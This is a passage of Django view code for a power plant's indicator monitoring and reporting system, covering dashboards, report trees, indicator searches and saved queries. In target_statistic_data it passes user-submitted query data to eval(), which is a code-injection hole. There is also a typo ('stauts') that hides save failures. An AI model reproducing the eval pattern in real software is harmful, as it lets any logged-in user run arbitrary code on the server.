经营指标\n rr_jyzbs = data[\"RR\"][\"JYZB\"]\n for rr_jyzb in rr_jyzbs:\n rr_jyzb_code = rr_jyzb[\"target\"]\n recent_data = get_target_data_recently(rr_jyzb_code)\n rr_jyzb[\"value\"] = recent_data.get(rr_jyzb[\"v_type\"], 0)\n rr_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n rr_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n rr_hbzbs = data[\"RR\"][\"HBZB\"]\n for rr_hbzb in rr_hbzbs:\n rr_hbzb_code = rr_hbzb[\"target\"]\n recent_data = get_target_data_recently(rr_hbzb_code)\n rr_hbzb[\"value\"] = recent_data.get(rr_hbzb[\"v_type\"], 0)\n rr_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n rr_hbzb[\"unit\"] = recent_data[\"unit\"]\n # 年计划\n rr_njhs = data[\"RR\"][\"FDL_JH\"]\n for rr_njh in rr_njhs:\n for rn in rr_njh:\n recent_data = get_target_data_recently(rn[\"target\"])\n rn[\"value\"] = recent_data.get(rn[\"v_type\"], 0)\n rn[\"target_name\"] = recent_data[\"target_name\"]\n # **************\n # 煤机\n # **************\n # 经营指标\n mj_jyzbs = data[\"MJ\"][\"JYZB\"]\n for mj_jyzb in mj_jyzbs:\n mj_jyzb_code = mj_jyzb[\"target\"]\n recent_data = get_target_data_recently(mj_jyzb_code)\n mj_jyzb[\"value\"] = recent_data.get(mj_jyzb[\"v_type\"], 0)\n mj_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n mj_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n 
mj_hbzbs = data[\"MJ\"][\"HBZB\"]\n for mj_hbzb in mj_hbzbs:\n mj_hbzb_code = mj_hbzb[\"target\"]\n recent_data = get_target_data_recently(mj_hbzb_code)\n mj_hbzb[\"value\"] = recent_data.get(mj_hbzb[\"v_type\"], 0)\n mj_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n mj_hbzb[\"unit\"] = recent_data[\"unit\"]\n\n # 年计划\n mj_njhs = data[\"MJ\"][\"FDL_JH\"]\n for mj_njh in mj_njhs:\n for mn in mj_njh:\n recent_data = get_target_data_recently(mn[\"target\"])\n mn[\"value\"] = recent_data.get(mn[\"v_type\"], 0)\n mn[\"target_name\"] = recent_data[\"target_name\"]\n # **************\n # 9F\n # **************\n # 经营指标\n jf_jyzbs = data[\"9F\"][\"JYZB\"]\n for jf_jyzb in jf_jyzbs:\n jf_jyzb_code = jf_jyzb[\"target\"]\n recent_data = get_target_data_recently(jf_jyzb_code)\n jf_jyzb[\"value\"] = recent_data.get(jf_jyzb[\"v_type\"], 0)\n jf_jyzb[\"target_name\"] = recent_data[\"target_name\"]\n jf_jyzb[\"unit\"] = recent_data[\"unit\"]\n\n # 环保指标\n jf_hbzbs = data[\"9F\"][\"HBZB\"]\n for jf_hbzb in jf_hbzbs:\n jf_hbzb_code = jf_hbzb[\"target\"]\n recent_data = get_target_data_recently(jf_hbzb_code)\n jf_hbzb[\"value\"] = recent_data.get(jf_hbzb[\"v_type\"], 0)\n jf_hbzb[\"target_name\"] = recent_data[\"target_name\"]\n jf_hbzb[\"unit\"] = recent_data[\"unit\"]\n\n # 年计划\n jf_njhs = data[\"9F\"][\"FDL_JH\"]\n for jf_njh in jf_njhs:\n for jn in jf_njh:\n recent_data = get_target_data_recently(jn[\"target\"])\n jn[\"value\"] = recent_data.get(jn[\"v_type\"], 0)\n jn[\"target_name\"] = recent_data[\"target_name\"]\n\n # ***************\n # 首页进程监控信息\n # ***************\n targets = Target.objects.filter(operationtype__in=[16, 1]).exclude(state=9).values('source_id', 'adminapp_id', 'cycle_id')\n def does_it_exist(source, adminapp=None, cycle=None):\n if source and not any([adminapp, cycle]):\n for t in targets:\n if source == t['source_id']:\n return True\n if all([source, adminapp]) and not cycle:\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id']:\n return True\n if all([source, adminapp, cycle]):\n for t in targets:\n if source == t['source_id'] and adminapp == t['adminapp_id'] and cycle == t['cycle_id']:\n return True\n return False\n source = Source.objects.exclude(state='9')\n app = App.objects.exclude(state='9')\n cycle = Cycle.objects.exclude(state='9')\n jk_info = [{\"work\": \"应用名称:\", \"cycle\": \"周期名称:\", \"last_time\": \"最新取数时间:\", \"remark\": \"运行说明:\"}]\n f_jk_info = []\n now_time = datetime.datetime.now()\n for s in source:\n if not s.type:\n if does_it_exist(s.id):\n for a in app:\n if does_it_exist(s.id, a.id):\n for c in cycle:\n if does_it_exist(s.id, a.id, c.id):\n cps = ProcessMonitor.objects.filter(source_id=s.id).filter(app_admin_id=a.id).\\\n filter(cycle_id=c.id).exclude(state='9')\n if cps.exists():\n cp = cps[0]\n remark = ''\n jk_dict = {}\n if cp.status == '运行中':\n if cp.last_time:\n lasttime_from_now = (now_time - cp.last_time).total_seconds() / 60 / 60\n if (lasttime_from_now) > 1:\n remark = '1小时内没有进行取数,请校对。'\n else:\n remark = '运行正常。'\n else:\n remark = '进程已关闭,请开启。'\n jk_dict['last_time'] = '{:%Y-%m-%d %H:%M:%S}'.format(\n cp.last_time) if cp.last_time else \"\"\n jk_dict['remark'] = remark\n jk_dict['work'] = cp.app_admin.name\n jk_dict['cycle'] = cp.cycle.name\n jk_info.append(jk_dict)\n else:\n # 固定节点(数据补取、数据清理)\n f_jk_dict = {}\n f_cps = ProcessMonitor.objects.filter(source_id=s.id).exclude(state='9')\n if f_cps.exists():\n f_cp = f_cps[0]\n if f_cp.status == '运行中':\n remark = '运行正常。'\n else:\n remark = '进程已关闭,请开启。'\n 
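# ---------------------------------------------------------------------------
# Aside: the monitor remark above boils down to "running AND fetched within
# the last hour". Isolated as a pure function it becomes unit-testable; a
# hypothetical refactoring sketch as a commented example (names and the exact
# no-last_time policy are assumptions):
#
#     def monitor_remark(status, last_time, now):
#         if status != '运行中':
#             return '进程已关闭,请开启。'
#         if last_time is None or (now - last_time).total_seconds() > 3600:
#             return '1小时内没有进行取数,请校对。'
#         return '运行正常。'
# ---------------------------------------------------------------------------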
f_jk_dict['last_time'] = '{:%Y-%m-%d %H:%M:%S}'.format(f_cp.last_time) if f_cp.last_time else \"无\"\n f_jk_dict['remark'] = remark\n f_jk_dict['work'] = f_cp.source.name\n f_jk_dict['cycle'] = \"无\"\n f_jk_info.append(f_jk_dict)\n jk_info += f_jk_info\n return JsonResponse({\n \"status\": status,\n \"data\": data,\n \"jk_info\": jk_info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef report_search(request, funid):\n if request.user.is_authenticated():\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n return render(request, 'report_search.html', {\n 'username': request.user.userinfo.fullname,\n \"pagefuns\": getpagefuns(funid, request),\n \"app_id\": app_id,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_report_search_data(request):\n \"\"\"获取已发布报表时间等信息,以树的形式展示\n 镇海电厂\n > 应用\n > 周期\n > 报表名称\n 时间 状态 \n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n app_id = request.POST.get(\"app_id\", \"\")\n\n # 应用 App\n # 报表类型 DictList DictIndex=7\n # 报表记录 ReportSubmit ReportModel\n apps = App.objects.exclude(state=\"9\")\n try:\n app_id = int(app_id)\n apps = apps.filter(id=app_id)\n except ValueError:\n pass\n\n cycles = DictList.objects.exclude(state=\"9\").filter(dictindex_id=12).values()\n report_submits = ReportSubmit.objects.filter(state=\"1\").order_by(\"-report_time\").values(\n \"id\", \"app_id\", \"report_model_id\", \"report_model__name\", \"state\", \"person\", \"write_time\", \"report_time\",\n \"report_model__report_type\", \"report_model__code\", \"report_model__file_name\"\n )\n report_models = ReportModel.objects.exclude(state=\"9\").values()\n\n rs = ReportServer.objects.first()\n report_server = rs.report_server if rs else ''\n\n # 周期 报表类型对应字典\n # 根据周期匹配报表类型\n compile_dict = {\n 10: 22,\n 11: 23,\n 12: 24,\n 13: 25,\n 14: 26\n }\n\n root_info = {}\n root_info[\"text\"] = \"镇海电厂\"\n root_info[\"type\"] = \"node\"\n root_info[\"state\"] = {'opened': True}\n\n app_list = []\n for app in apps:\n app_info = {}\n app_info[\"text\"] = app.name\n app_info[\"type\"] = \"node\"\n app_info[\"data\"] = {\n \"name\": app.name,\n \"code\": app.code\n }\n funs = app.fun_set.exclude(state=\"9\").filter(url__contains=\"report_submit\")\n fun_id = funs[0].id if funs else \"\"\n cur_url = funs[0].url if funs else \"\"\n\n cycle_list = []\n for cycle in cycles:\n cycle_info = {}\n cycle_info[\"text\"] = cycle['name']\n cycle_info[\"type\"] = \"node\"\n cycle_info[\"data\"] = {\n \"id\": cycle[\"id\"],\n \"name\": cycle[\"name\"]\n }\n\n report_model_list = []\n for report_model in report_models:\n report_model_info = {}\n\n report_type = \"\"\n try:\n report_type = compile_dict[cycle[\"id\"]]\n except Exception:\n pass\n if report_model[\"app_id\"] == app.id and report_model[\"report_type\"] == str(report_type):\n report_model_info[\"text\"] = report_model[\"name\"]\n report_model_info[\"type\"] = \"file\"\n\n # 报表数据\n report_submit_list = []\n for report_submit in report_submits:\n if report_submit[\"report_model_id\"] == report_model[\"id\"]:\n # 周期类型 + 时间\n params = \"?report_type={report_type}&report_time={report_time}\".format(**{\n \"report_type\": report_type,\n \"report_time\": get_format_date(report_submit[\"report_time\"], str(cycle[\"id\"]), type=\"E\") if report_submit[\"report_time\"] else \"\",\n })\n\n if fun_id:\n url = \"{0}/{1}{2}\".format(cur_url, fun_id, params) if not cur_url.endswith(\"/\") else 
\"{0}{1}{2}\".format(cur_url, fun_id, params)\n else:\n url = \"/index\"\n\n report_submit_list.append({\n \"name\": report_submit[\"report_model__name\"],\n \"write_time\": \"{0:%Y-%m-%d %H:%M:%S}\".format(report_submit[\"write_time\"]) if report_submit[\"write_time\"] else \"\",\n \"report_time\": get_format_date(report_submit[\"report_time\"], str(cycle[\"id\"])) if report_submit[\"report_time\"] else \"\",\n \"person\": report_submit[\"person\"],\n \"code\": report_submit[\"report_model__code\"],\n\n \"url\": url,\n \"relative_file_name\": app.code + '/' + report_submit[\"report_model__file_name\"],\n \"report_server\": report_server,\n \"reporting_date\": \"{0:%Y-%m-%d}\".format(report_submit[\"report_time\"]) if report_submit[\"report_time\"] else \"\",\n \"report_type_id\": report_type,\n })\n report_model_info[\"data\"] = report_submit_list\n report_model_list.append(report_model_info)\n\n if not report_model_list:\n continue\n cycle_info[\"children\"] = report_model_list\n cycle_list.append(cycle_info)\n\n app_info[\"children\"] = cycle_list\n app_list.append(app_info)\n root_info[\"children\"] = app_list\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": root_info\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_value_search(request, funid):\n if request.user.is_authenticated():\n # 管理应用id\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n # 月初 -> 现在\n n_time = datetime.datetime.now()\n end_date = \"{:%Y-%m-%d}\".format(n_time)\n start_date = \"{:%Y-%m-%d}\".format(n_time.replace(day=1))\n return render(request, 'target_value_search.html', {\n 'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid, request),\n \"app_id\": app_id, \"start_date\": start_date, \"end_date\": end_date,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef get_target_value(c_target, start_date, end_date):\n \"\"\"\n start_date与end_date必须在同一年\n :param operation_type:\n :param start_date:\n :param end_date:\n :return:\n \"\"\"\n data = []\n model_map = {\n \"1\": \"Meterdata\",\n \"15\": \"Entrydata\",\n \"16\": \"Extractdata\",\n \"17\": \"Calculatedata\",\n }\n if c_target:\n operation_type = c_target.operationtype\n target_id = c_target.id\n model_name = \"\"\n try:\n model_name = model_map[operation_type]\n except Exception:\n pass\n\n appointed_time_object = None\n\n if model_name:\n if not start_date and end_date:\n appointed_time_object = getmodels(model_name, str(end_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(datadate__lte=end_date.date())\n if start_date and not end_date:\n appointed_time_object = getmodels(model_name, str(start_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(datadate__gte=start_date.date())\n if all([start_date, end_date]):\n appointed_time_object = getmodels(model_name, str(start_date.year)).objects.exclude(state=\"9\").filter(target_id=target_id).filter(\n Q(datadate__gte=start_date.date()) & Q(datadate__lte=end_date.date())\n )\n # 对值的处理\n for ato in appointed_time_object.values(\n \"curvalue\", \"target__name\", \"target__code\", \"target__unity\", \"datadate\", \"target__digit\",\n \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n ):\n data.append({\n \"name\": ato[\"target__name\"],\n \"code\": ato[\"target__code\"],\n \"unity\": ato[\"target__unity\"],\n \"curvalue\": 
round(ato[\"curvalue\"] if ato[\"curvalue\"] else 0, ato[\"target__digit\"]),\n \"cumulativemonth\": round(ato[\"cumulativemonth\"] if ato[\"cumulativemonth\"] else 0, ato[\"target__digit\"]),\n \"cumulativequarter\": round(ato[\"cumulativequarter\"] if ato[\"cumulativequarter\"] else 0, ato[\"target__digit\"]),\n \"cumulativehalfyear\": round(ato[\"cumulativehalfyear\"] if ato[\"cumulativehalfyear\"] else 0, ato[\"target__digit\"]),\n \"cumulativeyear\": round(ato[\"cumulativeyear\"] if ato[\"cumulativeyear\"] else 0, ato[\"target__digit\"]),\n \"datadate\": ato[\"datadate\"]\n })\n\n return data\n\n\ndef get_target_search_data(request):\n \"\"\"\n 查询指标数据\n start_date end_date 可能不在同一年\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n all_data = []\n\n target = request.POST.get(\"target\", \"\")\n start_date = request.POST.get(\"start_date\", \"\")\n end_date = request.POST.get(\"end_date\", \"\")\n app_id = request.POST.get(\"app_id\", \"\")\n try:\n app_id = int(app_id)\n except ValueError:\n pass\n if not target:\n status = 0\n info = '指标代码或者指标名称未填写。'\n elif not start_date:\n status = 0\n info = \"开始时间未选择。\"\n elif not end_date:\n status = 0\n info = \"结束时间未选择。\"\n else:\n # 判断开始时间与结束时间是否在同一年\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n\n if start_date > end_date:\n status = 0\n info = \"开始时间不得迟于结束时间。\"\n else:\n c_targets = Target.objects.exclude(state=\"9\").filter(Q(name__icontains=target) | Q(code__icontains=target)).filter(\n Q(adminapp__id=app_id) | Q(app__id=app_id)\n )\n for c_target in c_targets:\n data = []\n\n start_date_year = start_date.year\n end_date_year = end_date.year\n delta_year = end_date_year - start_date_year\n if delta_year == 0: # 同一年\n target_values = get_target_value(c_target, start_date, end_date)\n data = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_values]\n else:\n # 开始时间到年底\n s_target_values = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in get_target_value(c_target, start_date, None)]\n # 结束时间到年初\n e_target_values = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in get_target_value(c_target, None, end_date)]\n\n m_target_values = []\n # 2017 2019 2 >>> 2018\n if delta_year > 1:\n for i in range(0, delta_year):\n start_date_year += 1\n start_date = datetime.datetime(start_date_year, 1, 1)\n target_values = 
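# ---------------------------------------------------------------------------
# Aside: because readings live in per-year tables, the cross-year branch of
# get_target_search_data splits [start_date, end_date] into start..Dec-31,
# whole middle years, and Jan-1..end. A compact enumeration of those spans
# (hypothetical helper, sketched as a commented example, not the module's
# actual control flow):
#
#     def year_spans(start, end):
#         return [(max(start, datetime.datetime(y, 1, 1)),
#                  min(end, datetime.datetime(y, 12, 31)))
#                 for y in range(start.year, end.year + 1)]
#
#     year_spans(datetime.datetime(2017, 6, 1), datetime.datetime(2019, 2, 1))
#     # -> [(2017-06-01, 2017-12-31), (2018-01-01, 2018-12-31),
#     #     (2019-01-01, 2019-02-01)]
# ---------------------------------------------------------------------------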
get_target_value(c_target, start_date, None)\n m_data = [{\n \"name\": tv[\"name\"],\n \"code\": tv[\"code\"],\n \"unity\": tv[\"unity\"],\n \"curvalue\": tv[\"curvalue\"],\n \"cumulativemonth\": tv[\"cumulativemonth\"],\n \"cumulativequarter\": tv[\"cumulativequarter\"],\n \"cumulativehalfyear\": tv[\"cumulativehalfyear\"],\n \"cumulativeyear\": tv[\"cumulativeyear\"],\n \"time\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_values]\n if m_data:\n m_target_values.extend(m_data)\n\n data = s_target_values + m_target_values + e_target_values\n\n all_data.extend(data)\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": sorted(all_data, key=lambda e: e.__getitem__('time'), reverse=True) if all_data else []\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_statistic(request, funid):\n if request.user.is_authenticated():\n # 管理应用id\n app_id = \"\"\n try:\n funid = int(funid)\n except ValueError:\n pass\n c_app = get_app_from_fun(funid)\n if not c_app[\"err\"]:\n app_id = c_app[\"app_id\"]\n\n # 周期类型\n cycle_list = DictList.objects.exclude(state=\"9\").filter(dictindex_id=12)\n\n return render(request, 'target_statistic.html', {\n 'username': request.user.userinfo.fullname, \"pagefuns\": getpagefuns(funid, request),\n \"cycle_list\": cycle_list, \"app_id\": app_id,\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_insert_data(request):\n if request.user.is_authenticated():\n result = []\n\n search_adminapp = request.GET.get('search_adminapp', '')\n\n search_operationtype = request.GET.get('search_operationtype', '')\n search_cycletype = request.GET.get('search_cycletype', '')\n search_businesstype = request.GET.get('search_businesstype', '')\n search_unit = request.GET.get('search_unit', '')\n datatype = request.GET.get('datatype', '')\n\n try:\n search_adminapp = int(search_adminapp)\n except:\n pass\n all_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").filter(Q(adminapp__id=search_adminapp) | Q(app__id=search_adminapp))\n\n if search_operationtype != \"\":\n all_target = all_target.filter(operationtype=int(search_operationtype))\n if search_cycletype != \"\":\n all_target = all_target.filter(cycletype=int(search_cycletype))\n if search_businesstype != \"\":\n all_target = all_target.filter(businesstype=int(search_businesstype))\n if search_unit != \"\":\n all_target = all_target.filter(unit=int(search_unit))\n if datatype != \"\":\n all_target = all_target.filter(datatype=datatype)\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n cumulative_dict = {\n \"0\": \"不累计\",\n \"1\": \"求和\",\n \"2\": \"算数平均\",\n \"3\": \"加权平均\",\n \"4\": \"非零算数平均\",\n \"5\": \"求和(上月)(环保专用)\"\n }\n for target in all_target:\n cycletype = target.cycletype\n if cycletype:\n for dict in all_dict_list:\n if cycletype == str(dict['id']):\n cycletype = dict['name']\n break\n result.append({\n \"id\": target.id,\n \"name\": target.name,\n \"code\": target.code,\n \"cycletype_name\": cycletype,\n \"cumulative\": cumulative_dict[target.cumulative],\n \"adminapp_name\": target.adminapp.name\n })\n return JsonResponse({\"data\": result})\n\n\ndef target_statistic_data(request):\n \"\"\"\n data = [{\n \"id\": 1,\n \"name\": \"查询1\",\n \"type\": \"10\",\n \"type_name\": \"日\",\n \"remark\": \"说明1\",\n \"target_col\": [{\n \"name\": \"第一列\",\n \"targets\": [{\"target_id\": 35, \"new_target_name\": \"新指标名1\", \"target_name\": \"指标1\"}, {\"target_id\": 36, \"new_target_name\": 
\"新指标名2\", \"target_name\": \"指标2\"}],\n \"remark\": \"指标列说明\",\n \"statistc_type\": \"0\"\n }, {\n \"name\": \"第二列\",\n \"targets\": [{\"target_id\": 37, \"new_target_name\": \"新指标名3\"}],\n \"remark\": \"指标列说明\",\n \"statistc_type\": \"1\"\n }]\n }, {\n \"id\": 2,\n \"name\": \"查询2\",\n \"type\": \"11\",\n \"type_name\": \"月\",\n \"remark\": \"说明2\",\n \"target_col\": [],\n }]\n :param request:\n :return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n data = []\n\n target_statistics = TargetStatistic.objects.exclude(state=\"9\").order_by(\"sort\")\n type_list = DictList.objects.filter(dictindex_id=12).values()\n\n for target_statistic in target_statistics:\n if request.user.userinfo == target_statistic.user or request.user.is_superuser:\n type_name = \"\"\n for tl in type_list:\n if str(tl['id']) == target_statistic.type:\n type_name = tl['name']\n\n target_col = eval(target_statistic.col_data)\n data.append({\n \"id\": target_statistic.id,\n \"name\": target_statistic.name,\n \"type\": target_statistic.type,\n \"type_name\": type_name,\n \"remark\": target_statistic.remark,\n \"sort\": target_statistic.sort,\n \"target_col\": target_col\n })\n\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n \"data\": data\n })\n else:\n return HttpResponseRedirect('/login')\n\n\ndef target_statistic_save(request):\n if request.user.is_authenticated():\n status = 1\n info = \"\"\n\n id = request.POST.get(\"id\", \"\")\n col_data = request.POST.get(\"col_data\", \"\")\n name = request.POST.get(\"name\", \"\")\n type = request.POST.get(\"type\", \"\")\n remark = request.POST.get(\"remark\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n\n try:\n id = int(id)\n except Exception:\n status = 0\n info = \"网络异常。\"\n else:\n if not name:\n status = 0\n info = \"查询名不能为空。\"\n elif not type:\n status = 0\n info = \"查询类型不能为空。\"\n else:\n try:\n col_data = json.loads(col_data)\n except Exception:\n pass\n\n if id == 0:\n try:\n TargetStatistic.objects.create(**{\n \"name\": name,\n \"type\": type,\n \"remark\": remark,\n \"sort\": int(sort) if sort else None,\n \"col_data\": col_data,\n \"user\": request.user.userinfo,\n })\n info = \"新增成功。\"\n except Exception as e:\n\n stauts = 0\n info = \"新增查询失败。\"\n else:\n try:\n TargetStatistic.objects.filter(id=id).update(**{\n \"name\": name,\n \"type\": type,\n \"remark\": remark,\n \"sort\": int(sort) if sort else None,\n \"col_data\": col_data,\n # \"user\": request.user.userinfo, # 编辑时不保存用户\n })\n info = \"修改成功。\"\n except Exception as e:\n status = 0\n info = \"修改查询失败。\"\n return JsonResponse({\n \"status\": status,\n \"info\": info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_statistic_del(request):\n if request.user.is_authenticated():\n status = 1\n info = \"删除成功。\"\n\n id = request.POST.get(\"id\", \"\")\n\n try:\n TargetStatistic.objects.filter(id=int(id)).update(**{\"state\": \"9\"})\n except Exception:\n status = 0\n info = \"删除失败。\"\n\n return JsonResponse({\n \"status\": status,\n \"info\": info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef statistic_report(request):\n \"\"\"\n\n @param request:\n @return: e_date\n s_date\n e_seasondate\n s_seasondate\n e_yeardate\n s_yeardate\n \"\"\"\n if request.user.is_authenticated():\n date_type = request.GET.get(\"date_type\", \"\")\n search_id = request.GET.get(\"search_id\", \"\")\n\n # date_type: 日 月 季 半年 年 显示不同时间\n n_time = datetime.datetime.now()\n\n e_time = n_time.replace(hour=0, minute=0, second=0, microsecond=0) # 结束时间\n 
def statistic_report(request):\n    \"\"\"\n    @param request:\n    @return: e_date\n             s_date\n             e_seasondate\n             s_seasondate\n             e_yeardate\n             s_yeardate\n    \"\"\"\n    if request.user.is_authenticated():\n        date_type = request.GET.get(\"date_type\", \"\")\n        search_id = request.GET.get(\"search_id\", \"\")\n\n        # date_type: day / month / quarter / half-year / year, each with its own default range\n        n_time = datetime.datetime.now()\n\n        e_time = n_time.replace(hour=0, minute=0, second=0, microsecond=0)  # end time\n        e_date = e_time.strftime(\"%Y-%m-%d\")\n        s_time = n_time.replace(hour=0, minute=0, second=0, microsecond=0)  # start time\n        s_date = s_time.strftime(\"%Y-%m-%d\")\n        if date_type == '10':  # day\n            # start date: first day of the current month\n            # end date: yesterday\n            # if today is the 1st: start = today, end = today\n            s_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0)\n            s_date = s_time.strftime(\"%Y-%m-%d\")\n            if n_time.day != 1:\n                e_time = n_time + datetime.timedelta(days=-1)\n                e_date = e_time.strftime(\"%Y-%m-%d\")\n            else:\n                e_time = n_time\n                e_date = e_time.strftime(\"%Y-%m-%d\")\n\n        if date_type == '11':  # month\n            # start date: January of the current year\n            # end date: last month\n            # if the current month is January: start = end = this month\n            s_time = n_time.replace(month=1, hour=0, minute=0, second=0, microsecond=0)\n            s_time = get_last_day_in_month(s_time)\n            s_date = s_time.strftime(\"%Y-%m\")\n            if n_time.month != 1:\n                e_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1)\n                e_date = e_time.strftime(\"%Y-%m\")\n            else:\n                e_time = n_time.replace(day=1, hour=0, minute=0, second=0, microsecond=0)\n                e_date = e_time.strftime(\"%Y-%m\")\n        e_seasondate = ''\n        s_seasondate = ''\n        if date_type == '12':  # quarter\n            now = n_time\n            # first month of the current quarter\n            month = (now.month - 1) - (now.month - 1) % 3 + 1\n            # one day before that month starts = last day of the previous quarter\n            now = (n_time.replace(month=month, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n            s_now = now - relativedelta(months=3)\n            s_now = get_last_day_in_month(s_now)\n\n            def get_date_and_seasondate(c_time):\n                date, seasondate = \"\", \"\"\n                year = c_time.strftime(\"%Y\")\n                if c_time.month in (1, 2, 3):\n                    season = 'Q1'\n                    seasondate = year + '-' + season\n                    date = year + '-' + \"03-31\"\n                if c_time.month in (4, 5, 6):\n                    season = 'Q2'\n                    seasondate = year + '-' + season\n                    date = year + '-' + \"06-30\"\n                if c_time.month in (7, 8, 9):\n                    season = 'Q3'\n                    seasondate = year + '-' + season\n                    date = year + '-' + \"09-30\"\n                if c_time.month in (10, 11, 12):\n                    season = 'Q4'\n                    seasondate = year + '-' + season\n                    date = year + '-' + \"12-31\"\n                return date, seasondate\n\n            e_date, e_seasondate = get_date_and_seasondate(now)\n            s_date, s_seasondate = get_date_and_seasondate(s_now)\n\n        e_yeardate = ''\n        s_yeardate = ''\n        if date_type == '13':  # half-year\n            now = n_time\n            month = (now.month - 1) - (now.month - 1) % 6 + 1\n            now = (n_time.replace(month=month, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n            s_now = now - relativedelta(months=6)\n            s_now = get_last_day_in_month(s_now)\n\n            def get_date_and_yeardate(c_time):\n                date, yeardate = \"\", \"\"\n                year = c_time.strftime(\"%Y\")\n                if c_time.month in (1, 2, 3, 4, 5, 6):\n                    season = 'H1'\n                    yeardate = year + '-' + season\n                    date = year + '-' + \"06-30\"\n                if c_time.month in (7, 8, 9, 10, 11, 12):\n                    season = 'H2'\n                    yeardate = year + '-' + season\n                    date = year + '-' + \"12-31\"\n                return date, yeardate\n\n            e_date, e_yeardate = get_date_and_yeardate(now)\n            s_date, s_yeardate = get_date_and_yeardate(s_now)\n        if date_type == '14':  # year\n            now = (n_time.replace(month=1, day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=-1))\n            s_now = now - relativedelta(months=12)\n            s_now = get_last_day_in_month(s_now)\n\n            e_date = now.strftime(\"%Y\")\n            s_date = s_now.strftime(\"%Y\")\n\n        search_name = \"\"\n        try:\n            search_name = TargetStatistic.objects.get(id=int(search_id)).name\n        except Exception:\n            pass\n\n        return render(request, \"statistic_report.html\", locals())\n    else:\n        return HttpResponseRedirect(\"/login\")\n\n\n
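# The quarter arithmetic in statistic_report, worked through (illustrative):\n# for now.month == 8, month = (8 - 1) - (8 - 1) % 3 + 1 = 7, i.e. the first\n# month of the current quarter; stepping back one day from July 1 lands on\n# June 30, the last day of the previous quarter.\n\n\n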
